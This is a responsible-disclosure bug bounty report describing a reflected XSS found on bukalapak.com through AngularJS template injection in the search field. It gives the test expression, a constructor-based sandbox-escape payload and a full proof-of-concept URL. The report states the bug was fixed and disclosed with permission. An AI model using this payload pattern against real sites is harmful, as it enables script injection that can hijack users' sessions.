Description :
I’ve found Reflected XSS on www.bukalapak.com via AngularJs , I found this by write {{31338-1}} on their search page and found result 31337 . And i also read h1 report from ysx for my reference to exploit this.
And I use payload from ysx to exploit AngularJS with {{constructor.constructor(‘alert(document.domain)’)()}} payload.
POC (Piye Om Carane ):
- login to account
- insert the payload to search field
- and XSS will fire up
POC URL :
https://www.bukalapak.com/products?utf8=%E2%9C%93&source=navbar&from=omnisearch&search_source=omnisearch_organic&search%5Bkeywords%5D=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D
Screenshoot :
It fixed 1 day after I report to them.
Reference :
- https://hackerone.com/reports/230234
- http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
Note: I got permission to disclose this report from bukalapak
For Indonesia Languange, you can see my original report on : https://drive.google.com/open?id=0B3hUlq3mDkikRndrLU9TcXo3Y04xVXI1MVJocE8yNXdNWlF3
Thanks!